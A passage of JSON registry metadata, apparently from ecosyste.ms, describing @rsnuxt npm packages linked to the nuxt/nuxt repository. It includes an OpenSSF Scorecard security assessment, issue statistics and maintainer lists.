job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.046Z","dependent_packages_count":0,"downloads":792,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/cli","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/cli","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/cli","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/cli/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcli/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:20.455Z","updated_at":"2025-02-11T09:42:20.455Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343196,"name":"@rsnuxt/vue-renderer","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":17,"first_release_published_at":"2025-02-11T09:14:55.227Z","latest_release_published_at":"2025-10-11T04:55:24.690Z","latest_release_number":"0.5.11","last_synced_at":"2026-05-11T01:23:06.412Z","created_at":"2025-02-11T09:37:17.809Z","updated_at":"2026-05-11T01:23:06.412Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/vue-renderer","install_command":"npm install @rsnuxt/vue-renderer","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.11"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows 